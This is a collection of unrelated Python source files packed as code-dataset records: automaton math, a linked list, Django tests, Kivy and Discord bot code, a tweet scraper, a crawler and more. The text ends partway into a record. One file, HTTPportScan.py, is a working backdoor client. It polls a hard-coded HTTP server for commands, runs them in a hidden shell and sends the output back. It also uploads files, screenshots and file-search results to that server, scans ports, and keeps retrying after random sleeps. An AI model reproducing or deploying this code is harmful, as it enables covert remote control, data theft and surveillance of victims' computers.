self.f_dict = {}\n for i in range(8):\n self.f_dict[np.binary_repr(i, 3)] = self.wolfram[7-i]\n \n self.init_dict = {\"0\": [], \"1\":[]}\n for i, value in enumerate(self.wolfram):\n self.init_dict[str(value)].append(np.binary_repr(7-i, 3))\n \n self.next_dict = {}\n for i, value in enumerate(self.wolfram):\n neigh = np.binary_repr(7-i, 3)\n if neigh[0]+ neigh[1]+ str(value) not in self.next_dict:\n self.next_dict[neigh[0]+ neigh[1]+ str(value)] = [str(neigh[2])]\n else:\n self.next_dict[neigh[0]+ neigh[1]+ str(value)].append(str(neigh[2]))\n \n def F_cyclic(self, state):\n n = len(state)\n new_state = \"\"\n for i in range(len(state)):\n new_state += self.f_dict[state[(i-1)%n]+ state[i%n]+ state[(i+1)%n]]\n return new_state\n\n\n def preimage_cyclic(self, u):\n n = len(u)\n while n<4:\n u += u \n n = len(u)\n preimages = []\n try:\n potential = [i for i in self.init_dict[u[0]]]\n except:\n return preimages\n while potential:\n a = potential.pop(0)\n if len(a) == len(u):\n if self.f_dict[a[-2] + a[-1] + a[0]] == u[-2] and self.f_dict[a[-1]+a[0]+a[1]] == u[-1]:\n preimages.append(a[1:] + a[0])\n continue\n try:\n nexts = self.next_dict[a[-2]+ a[-1]+ u[(len(a)-2)%n]]\n for i in nexts:\n b = a + i\n if len(b) == len(u):\n if self.f_dict[b[-2] + b[-1] + b[0]] == u[-2] and self.f_dict[b[-1]+b[0]+b[1]] == u[-1]:\n preimages.append(b[1:] + b[0])\n else:\n potential.append(b)\n except:\n continue\n return preimages\n\ndef rotate(strg, n):\n return strg[n:] + strg[:n]\n\ndef F(state, f_dic):\n n = len(state)\n new_state = \"\"\n for i in range(1, len(state)-1):\n new_state += f_dic[state[(i-1)%n] + state[i%n] + state[(i+1)%n]]\n return new_state\n\ndef f(rule):\n wolfram = np.binary_repr(rule, 8)\n f_dic = {}\n for i in range(8):\n f_dic[np.binary_repr(i, 3)] = wolfram[7-i]\n return f_dic\n\n# print(aut.f_dict)\n# u = \"111110001111101011000110011111111101111\"\n# \n# for _ in range(13):\n# preimages = aut.preimage_cyclic(u)\n# print(preimages)\n# if preimages:\n# print(\"pokracuju\")\n# print()\n# u = preimages[0]\n\n\n# for N in range(2, 8):\n# \n# GOE_N = set()\n# f_dic = f(rule)\n# \n# \n# for init in product([\"0\", \"1\"], repeat=3*N):\n# u = \"\".join(i for i in init)\n# if not aut.preimage_cyclic(u):\n# GOE_N.add(u)\n# v = u\n# for _ in range(N-1):\n# v = F(v, f_dic)\n# GOE_N.add(u)\n# size = len(GOE_N)\n# print(f\"{100*(size/2**(3*N))}%, N={3*N}\")\n \n \n \n\n\n\n\"\"\"pripravka pro kombinatoriku pravidla 110 \"\"\"\n# l = 6\n# i = 0\n# for tup in product([\"0\", \"1\"], repeat=l):\n# u = \"\".join(i for i in tup)\n# v = \"0\" + u + \"0\"\n# if \"010\" in v:\n# print(v)\n# i += 1\n# print(i)\n\n\n\n# rule = np.random.choice(RULES)\n# init = np.binary_repr(np.random.randint(10, 800), 20)\n# f_dic = f(rule)\n# print(\"rule: \", rule)\n# print(f(rule))\n# print(init_dict(rule))\n# print(next_dict(rule))\n# u = \"01010101\"\n# preimages = preimage_cyclic(u, init_dict(rule), next_dict(rule), f(rule))\n# print(preimages)\n# \n# for p in preimages:\n# if F_cyclic(p, f_dic) == u:\n# print(\"sedi to\")\n\n","sub_path":"DDLab/preimages.py","file_name":"preimages.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"633106968","text":"# linked list finally implementation\n\nfrom typing import Counter\n\n\nclass Node:\n def __init__(self, element = \"start\" , next = None):\n self.element = element\n self.next = next\n\nclass linked_list:\n def __init__(self):\n self.head = Node()\n\n def append_at_beginning(self, element):\n node = Node(element, self.head.next)\n self.head.next = node\n\n def append_at_end(self, element):\n c_node = self.head\n while c_node.next:\n c_node = c_node.next\n c_node.next = Node(element, None)\n\n def get_length(self):\n cnt = 0\n c_node = self.head\n while c_node:\n cnt += 1\n c_node = c_node.next\n return cnt\n\n def insert_at_specific_index(self, index, element):\n if index < 0 or index > self.get_length():\n print(\"Invalid Index\")\n return\n\n if index == 0:\n self.append_at_beginning(element)\n return\n \n cnt = 0\n c_node = self.head\n while c_node:\n if cnt == index - 1 :\n node = Node(element, c_node.next)\n c_node.next = node\n break\n c_node = c_node.next\n cnt += 1\n\n def printing(self):\n if self.head is None:\n print(\"Empty Linked list\")\n return\n\n c_node = self.head\n result = \"\"\n while c_node:\n result = result + str (c_node.element) + ' ---> '\n c_node = c_node.next\n\n print(result)\n\nif __name__ == '__main__' :\n LL = linked_list()\n\n # append at beginning\n LL.append_at_beginning(500)\n LL.append_at_beginning(400)\n LL.printing()\n\n # append at end\n LL.append_at_end(600)\n LL.append_at_end(700)\n LL.printing()\n\n # insert at specific index\n LL.insert_at_specific_index(3, 4352)\n LL.insert_at_specific_index(5, 8097)\n LL.printing()","sub_path":"Ratul_LL_finally_done_05.py","file_name":"Ratul_LL_finally_done_05.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"194952019","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nfrom django.db.models.signals import post_init, post_save\nfrom django.dispatch import Signal\nfrom django.test import TestCase\nfrom tests.myapp.models import Foo, test_handler\nfrom roadies.handlers import handler, Handler\n\ntry:\n import mock\nexcept ImportError:\n from unittest import mock\n\n\ndef async_action(*args):\n pass\n\n\n@handler\ndef do_something(sender, foo, bar, **kwargs):\n \"\"\"Test functional handlers.\"\"\"\n async_action(foo, bar)\n\n\n@handler(post_init, sender='myapp.Foo', dispatch_uid='testing')\ndef do_something_else(sender, instance, **kwargs):\n async_action(instance)\n\n\ntest_signal = Signal(providing_args=['foo', 'bar'])\n\n\nclass HandlerTests(TestCase):\n\n def test_do_something_is_handler_instance(self):\n self.assertIsInstance(do_something, Handler)\n\n def test_connect_no_sender(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertTrue(result)\n result = do_something.disconnect(test_signal, dispatch_uid='testing')\n self.assertFalse(result)\n\n def test_connect_with_sender_string(self):\n do_something.connect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertTrue(disconnected)\n\n disconnected = do_something.disconnect(\n test_signal,\n sender='myapp.Foo',\n dispatch_uid='testing'\n )\n self.assertFalse(disconnected)\n\n def test_do_something_name(self):\n self.assertEqual(do_something.__name__, 'do_something')\n\n def test_do_something_module(self):\n self.assertEqual(do_something.__module__, 'tests.test_handlers')\n\n def test_do_something_doc(self):\n self.assertEqual(do_something.__doc__, 'Test functional handlers.')\n\n def test_do_something_does_something_on_signal(self):\n do_something.connect(test_signal, dispatch_uid='testing')\n with mock.patch('tests.test_handlers.async_action') as func:\n test_signal.send(None, foo=1, bar=2)\n self.assertTrue(func.called)\n func.assert_called_once_with(1, 2)\n\n def test_do_something_else_is_handler(self):\n self.assertIsInstance(do_something_else, Handler)\n\n def test_do_something_else_executed_on_post_init(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n instance = Foo(bar='baz')\n self.assertTrue(func.called)\n func.assert_called_once_with(instance)\n\n def test_calling_the_handler_directly(self):\n with mock.patch('tests.test_handlers.async_action') as func:\n do_something(None, 'foo', 'bar')\n self.assertTrue(func.called)\n func.assert_called_once_with('foo', 'bar')\n\n def test_autodiscover_works(self):\n self.assertTrue(\n post_save.disconnect(test_handler, dispatch_uid='test_handler')\n )\n","sub_path":"tests/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"416839433","text":"# -*- coding: utf-8 -*-\nimport mywallet\nimport uuosconfig\n\nfrom kivy.uix.button import Label\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.uix.popup import Popup\nfrom customui import show_reminder\nfrom lang import tr\n\nclass LanguageDialog(Popup):\n def __init__(self, action):\n super(LanguageDialog, self).__init__()\n language = uuosconfig.get_value('language')\n if language is None:\n language = 1\n if language == 0:\n self.index = 0\n self.ids.box_english.active = True\n elif language == 1:\n self.index = 1\n self.ids.box_chinese.active = True\n \n def on_ok(self):\n print(self.index)\n uuosconfig.set_value('language', self.index)\n lang_name = ['en', 'cn'][self.index]\n uuosconfig.app.switch_lang(lang_name)\n uuosconfig.set_value('lang', lang_name)\n self.dismiss()\n\n def on_cancel(self):\n self.dismiss()\n\nclass ThemingDialog(Popup):\n def __init__(self):\n super(ThemingDialog, self).__init__()\n theme = uuosconfig.get_current_theme()\n self.setting = uuosconfig.get_current_theme()\n #self.ids.id_switch_theme.bind(on_press=uuosconfig.app.switch_theme)\n if theme == 'normal':\n self.ids.id_normal.active = True\n self.ids.id_black.active = False\n self.setting = 'normal'\n else:\n self.ids.id_normal.active = False\n self.ids.id_black.active = True\n self.setting = 'black'\n def on_ok(self):\n show_reminder(tr._('Restart App to make the new settings take effect'))\n uuosconfig.set_current_theme(self.setting)\n uuosconfig.app.switch_theme(self.setting)\n #self.change_bgcolor(self.setting)\n #print(uuosconfig.app.theme)\n self.dismiss()\n\nclass SettingScreen(Screen):\n def __init__(self, **kargs):\n super(SettingScreen, self).__init__(**kargs)\n print(uuosconfig.get_current_theme())\n\n def swith_language(self):\n self.dialog = LanguageDialog(self.on_ok)\n self.dialog.ids.id_chinese.text = '中文'\n self.dialog.open()\n\n def check_upgrade(self):\n show_reminder(tr._(\"No upgrade detected\"))\n\n def on_ok(self):\n self.dialog.on_ok()\n self.dialog.dismiss()\n\n def swith_theme(self):\n popup = ThemingDialog()\n popup.open()\n print(uuosconfig.app.theme)\n \n # def set_bgcolor(self,theme):\n # if theme == 'normal':\n # uuosconfig.bg_color = [0.965,0.965,0.965,1]\n # else \n # uuosconfig.bg_color = [0.1176,0.1294,0.1647,1]","sub_path":"settingscreen.py","file_name":"settingscreen.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"334080852","text":"'''\r\nCreated on 10 feb. 2018\r\n\r\n@author: Sven\r\n'''\r\n\r\nif __name__ == '__main__':\r\n pass\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nfrom matplotlib.lines import Line2D\r\n\r\n# Prepare 100 random numbers to plot\r\nx = np.random.rand(100)\r\ny = np.random.rand(100)\r\n# Prepare 100 random numbers within the range of the number of\r\n# available markers as index\r\n# Each random number will serve as the choice of marker of the\r\n# corresponding coordinates\r\nmarkerindex = np.random.randint(0, len(Line2D.markers), 100)\r\nprint(markerindex)\r\n\r\n# shows possible markers and abbreviation\r\nprint(Line2D.markers)\r\n\r\n# Plot all kinds of available markers at random coordinates\r\n# for each type of marker, plot a point at the above generated\r\n# random coordinates with the marker type\r\nfor k, m in enumerate(Line2D.markers):\r\n i = (markerindex == k)\r\n plt.scatter(x[i], y[i], marker=m)\r\n\r\nplt.show()\r\n\r\n# Prepare 5 lines\r\nx = np.linspace(0,20,10)\r\ny1 = x\r\ny2 = x*2\r\ny3 = x*3\r\ny4 = x*4\r\ny5 = x*5\r\n\r\n\r\n# Plot lines with different marker sizes\r\nplt.plot(x,y1,label = 'x', lw=1, marker='s', ms=5) # square size 10\r\nplt.plot(x,y2,label = '2x', lw=1, marker='^', ms=6) # triangle size 12\r\nplt.plot(x,y3,label = '3x', lw=1, marker='o', ms=5) # circle size 10\r\nplt.plot(x,y4,label = '4x', lw=1, marker='D', ms=4) # diamond size 8\r\nplt.plot(x,y5,label = '5x', lw=1, marker='P', ms=6) # filled plus sign\r\n# size 12\r\n\r\n# get current axes and store it to ax\r\nax = plt.gca()\r\nplt.legend()\r\nplt.show()\r\n","sub_path":"LearnPython/scripts/learnmathplotlib/markers.py","file_name":"markers.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"250162369","text":"# Script to scrape,download and store twitter data into a MongoDB database. The data will be used to feed ML algoirthms and analyze sentiment, spam and other analysis.\n# A modified version of GetOldTweets3 library is used. A .10 sec sleep timer is added to prevent passing normal twitter API request limits. We want to not abuse our calls :).\n# Script run time is dependent on start date to current date but the average time to return 1000 tweets for one day is 40 seconds.\nimport GetOldTweets3 as tweetory\nimport mongoengine as mongo\nfrom tweet import Tweet\nimport datetime\nfrom argparse import ArgumentParser\nfrom dateutil.relativedelta import *\nfrom time import time\nimport requests\nimport random\n\n# stores data into a Schema and saves it into MongoDB. The data is the typical tweet data that can be gathered from scraping like username, likes, retweets etc... Additionally we use Textblob to store the sentiment on the tweet.\n# We're storing sentiment now because even when we do the spam classification we still want the sentiment as extra information. Spam is still data!\n\n\ndef store_data(tweet_list):\n for tweet in tweet_list:\n chirp = Tweet()\n chirp.tweet_id = tweet.id\n chirp.permalink = tweet.permalink\n chirp.date = tweet.date\n chirp.username = tweet.username\n chirp.author_id = tweet.author_id\n chirp.tweet = tweet.text\n chirp.retweets = tweet.retweets\n chirp.likes = tweet.favorites\n chirp.comments = tweet.comments\n chirp.mentions = tweet.mentions\n chirp.hashtags = tweet.hashtags\n chirp.cashtags = tweet.cashtags\n chirp.urls = tweet.urls\n try:\n chirp.save()\n except Exception as e:\n print(\"ERROR: \", e)\n continue\n print(\"Saved...\")\n\n\ndef get_proxy(previous=\"\", proxies=[]):\n if not proxies:\n with open(\"proxy-list.txt\") as f:\n proxies = f.read().splitlines()\n\n proxy = proxies[random.randrange(len(proxies))]\n\n if proxy == previous:\n return get_proxy(previous, proxies)\n return proxy\n\n\nif (__name__ == \"__main__\"):\n parser = ArgumentParser(\n description=\"Stores cryptocurrency related tweets into a MongoDB database.\")\n parser.add_argument(\n \"--max\", type=int, help=\"Value for maximum number of tweets to be returned per day. Default 1000.\", default=1000)\n parser.add_argument(\n \"--start\", type=str, help=\"Start date to retrieve tweets from in ISO format YYYY-MM-DD. Default: 2015-01-01\", default=\"2015-01-01\")\n parser.add_argument(\n \"--end\", type=str, help=\"End date to retrieve tweets up to in ISO format YYYY-MM-DD. Default: Today non inclusive.\", default=datetime.date.today().isoformat())\n parser.add_argument(\n \"--keywords\", type=str, help=\"Keywords to be used for searching\", nargs=\"*\",\n default=[\"bitcoin\", \"altcoin\", \"cryptocurrency\", \"blockchain\", \"DAO\", \"dApp\", \"decentralized app\", \"digital asset\", \"cryptotokens\", \"cryptoassets\", \"masternode\", \"proof of stake\", \"proof of work\", \"pump and dump\", \"satoshi\", \"satoshi nakamoto\", \"shilling\", \"solidity\", \"the dao\", \"tokenized\",\n \"digital economy\", \"crypto whale\", \"white paper\", \"airdrop\"])\n parser.add_argument(\n \"--db\", type=str, help=\"Databse name to be used in mongoDB\", default=\"crypto-twitter\")\n\n arguments = parser.parse_args()\n\n print(\"Welcome to Crypto Tweet Historical Database!\")\n\n try:\n print(f\"Connecting to MongoDb server {arguments.db}...\")\n mongo.connect(arguments.db)\n except Exception as e:\n print(\"Failed to connect to MongoDB server...\")\n print(\"ERROR: \", e)\n print(\"Exiting...\")\n exit()\n else:\n print(\"Connected...\")\n\n try:\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n end_date = datetime.datetime.strptime(arguments.end, \"%Y-%m-%d\").date()\n\n except Exception as e:\n print(\"Received start and end dates were not parsable. ISO format(YYYY-MM-DD) required\")\n exit()\n\n date_delta = relativedelta(days=+1)\n max_tweets = arguments.max\n search = arguments.keywords\n proxy = get_proxy()\n\n print(\n f\"Starting tweet retrieval from {start_date.isoformat()} to {end_date.isoformat()}. {max_tweets} per day per search term. For {len(search)} search terms.\")\n print(f\"Using proxy:{proxy}\")\n # For each term loop through each day and pull the historical data by scraping twitter data using GetOldTweets3 library. Requests are throttled via a 0.10 sec sleep so as not to ever exceed standard twitter\n # API limits. Average time to retrieve 1000 tweets per each day is 39sec. You can estimate the time in seconds to completion: (start_date - today_date) * 39sec/1000tweet * len(search_terms).\n for term in search:\n while (start_date != end_date):\n since = start_date.isoformat()\n until = (start_date + date_delta).isoformat()\n\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}.\")\n print(f\"Using proxy:{proxy}\")\n\n tweetCriteria = tweetory.manager.TweetCriteria().setQuerySearch(\n term).setSince(since).setUntil(until).setMaxTweets(max_tweets).setLang(\"en\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"Retrying last search..\")\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n\n print(\n f\"Retrieved tweets stored for {term.upper()}...\\nContinuing...\\n\")\n # reset start_date back to original value if not the while loop will not initiate do to a false condition being met.\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"All search terms saved...\\nExiting...\\nGoodbye.\")\n","sub_path":"CreateDatabase/create-db.py","file_name":"create-db.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"638761106","text":"import pygame\n\nclass Asteroid(pygame.sprite.Sprite):\n def __init__(self,size,x,y,color):\n super().__init__()\n self.size = size\n self.color = color\n self.image = pygame.Surface( (self.size, self.size))\n self.image.fill(self.color)\n self.rect = self.image.get_rect(topleft=(x, y))\n\n\n","sub_path":"asteroid.py","file_name":"asteroid.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566521495","text":"from loguru import logger\n\nfrom sinric import Sinric\n\napiKey = \"Api Key\"\n\n\ndef power_state(deviceId, state):\n logger.info(\"{} {}\", deviceId, state)\n\n\ndef set_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef adjust_target_temp(deviceId, value, scale):\n logger.info(\"{} {} {}\", deviceId, value, scale)\n\n\ndef set_thermostat_mode(deviceId, value):\n logger.info(\"{} {}\", deviceId, value)\n\n\ncallbacks = {\n \"setPowerState\": power_state,\n \"SetTargetTemperature\": set_target_temp,\n \"AdjustTargetTemperature\": adjust_target_temp,\n \"SetThermostatMode\": set_thermostat_mode,\n}\n\nif __name__ == \"__main__\":\n ob = Sinric(apiKey, callbacks)\n ob.handle()\n","sub_path":"python_examples/examples/thermostat_example.py","file_name":"thermostat_example.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"228902979","text":"import re\n\nfrom MessageHandler.Command._Command import _Command\n\n\nclass _Translation(_Command):\n\n def __init__(self):\n super(__class__, self).__init__()\n self._set_translation({})\n\n def _set_translation(self, translation):\n self.__translation = translation\n\n async def _execute(self, message):\n reply = message.content\n for from_word, to_word in self.__translation.items():\n pattern = re.compile(from_word, re.IGNORECASE)\n reply = pattern.sub(to_word, reply)\n return reply\n","sub_path":"MessageHandler/Command/Commands/Translation/_Translation.py","file_name":"_Translation.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"91546305","text":"import time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef dailystatistics(finish):\n with open(finish, 'r') as f:\n content = f.readlines()\n\n times = []\n for i in content:\n if not i.startswith(\"/\") and i:\n temp = time.strptime(i.strip(), \"%a %b %d %H:%M:%S CST %Y\")\n a = time.strftime('%F',temp)\n times.append(a)\n\n datas = pd.DatetimeIndex(times)\n jobs = np.ones(len(datas))\n data = pd.DataFrame(data=jobs, index=times, columns=['job'])\n new_jobs = data.groupby(level=0)\n zjw = new_jobs.count()\n zjw.sort_index()['job'].plot()\n plt.show()\n\nif __name__ == \"__main__\":\n # finish = \"/Users/zhangjiawei/Documents/code/researchcode/dailystatistics/finish\"\n dailystatistics(finish=sys.argv[1])\n","sub_path":"dailystatistics/dailyjobplot.py","file_name":"dailyjobplot.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"596883984","text":"# Пользователь вводит месяц в виде целого числа от 1 до 12.\r\n# Сообщить к какому времени года относится месяц (зима, весна, лето, осень).\r\n# Напишите решения через list и через dict.\r\n\r\ncalend_list = ['зима', 'зима', 'весна', 'весна', 'весна', 'лето', 'лето', 'лето',\r\n 'осень', 'осень', 'осень', 'зима']\r\ncalend_dict = {1: 'январь', 2: 'февраль', 3: 'март', 4: 'апрель', 5: 'май', 6: 'июнь',\r\n 7: 'июль', 8: 'август', 9: 'сентябрь', 10: 'октябрь', 11: 'ноябрь', 12: 'декабрь'}\r\nwhile True:\r\n month = int(input('Введите номер месяца от 1 до 12: '))\r\n if month < 1 or month > 12:\r\n print('В нашем календаре только 12 месяцев')\r\n else:\r\n break\r\nprint(f'Месяц №{month} - {calend_dict.get(month)}. Время года - {calend_list[month - 1]}')\r\n","sub_path":"2.3_calendar.py","file_name":"2.3_calendar.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358799992","text":"#библиотека для Discord бота\n\n\nclass Member(object):\n\t\"\"\"Класс пользователя сервера\"\"\"\n\tdef __init__(self, name, user_id, is_bot, money):\n\t\tself.name = name\n\t\tself.user_id = user_id\n\t\tself.is_bot = is_bot\n\t\tself.money = money\n\tdef __str__(self):\n\t\ttext = self.name + str(self.user_id) + str(self.is_bot) + str(self.money)\n\t\treturn text\n\tdef info(self):\n\t\ttext = \"User name: \" + self.name \\\n\t\t+ \"\\nUser id: \" + str(self.user_id) \\\n\t\t+ \"\\nBot: \" + str(self.is_bot) \\\n\t\t+ \"\\nBalance: \" + str(self.money) + \"\\n\"\n\t\treturn text\n\ndef init(s_name):\n\t\"\"\"Открытие потока чтения/записи\"\"\"\n\ttry:\n\t\tfile = open(s_name, \"rb\")\n\t\treturn file, False\n\texcept:\n\t\tfile = open(s_name, \"wb\")\n\t\treturn file, True\n\ndef get_members(client, server_name):\n\t\"\"\"Получение списка пользователей сервера\"\"\"\n\tservers = client.servers\n\tfor server in servers:\n\t\tif server_name.upper() == server.name.upper():\n\t\t\tmembers = []\n\t\t\tfor member in server.members:\n\t\t\t\tmembers.append(member)\n\t\t\treturn members\n\ndef make_map(members):\n\t\"\"\"Создание словаря пользователей сервера\"\"\"\n\tmember_map = {}\n\tfor member in members:\n\t\tmember_map[str(member.id)] = Member(member.name, member.id, member.bot, 0)\n\treturn member_map\t\n\ndef make_info(members, message):\n\t\"\"\"Создание информационного сообщения\"\"\"\n\ttext = \"```\\n\" + members[str(message.author.id)].info() + \"```\"\n\treturn text\n\ndef add_money(members, message, count):\n\t\"\"\"Добавление денег пользователю\"\"\"\n\tmembers[str(message.author.id)].money += count\n\ndef update(members, pickle, s_name):\n\t\"\"\"Обновление данных\"\"\"\n\tfile = open(s_name, \"wb\")\n\tpickle.dump(members, file)\n\tfile.close()\n\ndef member_add(member, members):\n\t\"\"\"Добавление новго пользователя в словарь\"\"\"\n\tif str(member.id) not in members:\n\t\tmembers[str(member.id)] = Member(member.name, member.id, member.bot, 0)\t\t\n\ndef check(message, s_name):\n\t\"\"\"Проверка сообщения\"\"\"\n\tignorred_id =[\"472644886059810826\", \"487254203467825153\"]\n\ttemp = message.author.id\n\tif message.server.name.upper() == s_name and temp not in ignorred_id:\n\t\treturn True\n\telse:\n\t\treturn False\n\nif __name__ == \"__main__\":\n\tprint(\"Подключаемый модуль\")","sub_path":"bot_lib.py","file_name":"bot_lib.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"423701732","text":"import requests\r\nimport subprocess\r\nimport time\r\nimport os\r\nimport random\r\nimport socket\r\nfrom PIL import ImageGrab as imagegrab\r\nimport tempfile\r\nimport shutil\r\n\r\ndef subprocess_args(include_stdout=True):\r\n shell = True\r\n if hasattr(subprocess, 'STARTUPINFO'):\r\n si = subprocess.STARTUPINFO()\r\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\r\n env = os.environ\r\n else:\r\n si = None\r\n env = None\r\n if include_stdout:\r\n ret = {'stdout': subprocess.PIPE}\r\n else:\r\n ret = {}\r\n ret.update({'stdin': subprocess.PIPE,\r\n 'stderr': subprocess.PIPE,\r\n 'startupinfo': si,\r\n 'env': env,\r\n 'shell': shell})\r\n return ret\r\n\r\ndef changeDirectory(directory):\r\n os.chdir(directory)\r\n requests.post(url = 'http://192.168.0.10',data = ('[+] CWD is ' + os.getcwd()))\r\n\r\ndef grabfile(path):\r\n if os.path.exists(path):\r\n rpath = os.path.realpath(path)\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': rpath}\r\n r = requests.post(url, files=files)\r\n else:\r\n post_response = requests.post(url='http://192.168.0.10',data='[-] Not able to find the file.')\r\n\r\ndef takescreenshot():\r\n dirpath = tempfile.mkdtemp()\r\n path = dirpath + '\\img.jpg'\r\n imagegrab.grab().save(path, \"JPEG\")\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': 'screencap.jpg'}\r\n r = requests.post(url, files=files)\r\n files['file'].close()\r\n shutil.rmtree(dirpath)\r\n\r\ndef search(path,ext):\r\n list = ''\r\n for dirpath, dirname, files in os.walk(path):\r\n for file in files:\r\n if file.endswith(ext):\r\n list = list + '\\n' + os.path.join(dirpath,file)\r\n requests.post(url='http://192.168.0.10',data=list)\r\n\r\ndef scanner(ip,ports):\r\n scan_result = ''\r\n for port in ports.split(','):\r\n try:\r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n output = sock.connect_ex((ip,int(port)))\r\n\r\n if output == 0:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is open.\\n\"\r\n else:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is closed or the host is not reachable.\\n\"\r\n sock.close()\r\n except Exception as e:\r\n pass\r\n requests.post(url='http://192.168.0.10',data=scan_result)\r\n \r\ndef connect():\r\n while True:\r\n req = requests.get('http://192.168.0.10')\r\n command = req.text\r\n\r\n if \"terminate\" in command:\r\n return 1\r\n elif 'cd ' in command:\r\n code,directory = command.split()\r\n changeDirectory(directory)\r\n elif 'grab' in command:\r\n grab,path = command.split(\" * \")\r\n grabfile(path)\r\n elif 'screencap' in command:\r\n takescreenshot()\r\n elif 'search' in command:\r\n command = command[7:]\r\n print(command)\r\n path,ext = command.split('*')\r\n search(path,ext)\r\n elif 'scan' in command:\r\n command = command[5:]\r\n ip,ports = command.split(':')\r\n scanner(ip,ports)\r\n else:\r\n CMD = subprocess.Popen(command,**subprocess_args(True))\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stdout.read())\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stderr.read())\r\n\r\n time.sleep(3)\r\n\r\ndef main():\r\n while True:\r\n try:\r\n if connect() == 1:\r\n break\r\n except:\r\n sleep_for = random.randrange(1,10)\r\n time.sleep(sleep_for) #Sleep for a random time between 1 and 10 seconds\r\n #time.sleep(sleep_for * 60) #Sleep for a random time between 1 and 10 minutes\r\n pass\r\n \r\nmain()\r\n","sub_path":"3/HTTPportScan.py","file_name":"HTTPportScan.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"593017022","text":"\n\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.spider import BaseSpider\nfrom scrapy.http import Request\n\nDOMAIN = 'intranet.iitg.ernet.in/'\nURL = 'http://intranet.iitg.ernet.in/'\nlis=[]\nindex_element = 0 \n\nclass MySpider(BaseSpider):\n name = 'crawler'\n #allowed_domains = [DOMAIN]\n start_urls = [\n URL\n ]\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n for url in hxs.select('//a/@href').extract():\n if not ( url.startswith('http://') or url.startswith('https://') ):\n url= URL + url\n if 'iitg' in url:\n if url not in lis:\n lis.append(url) \n fo=open('finallink.txt','a')\n fo.write(url + \"\\n\")\n fo.close()\n yield Request(url, callback=self.parse)\n\n","sub_path":"crawler iitg intranet/craigslist_sample/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53626420","text":"\nfrom ast import *\n\n\nclass 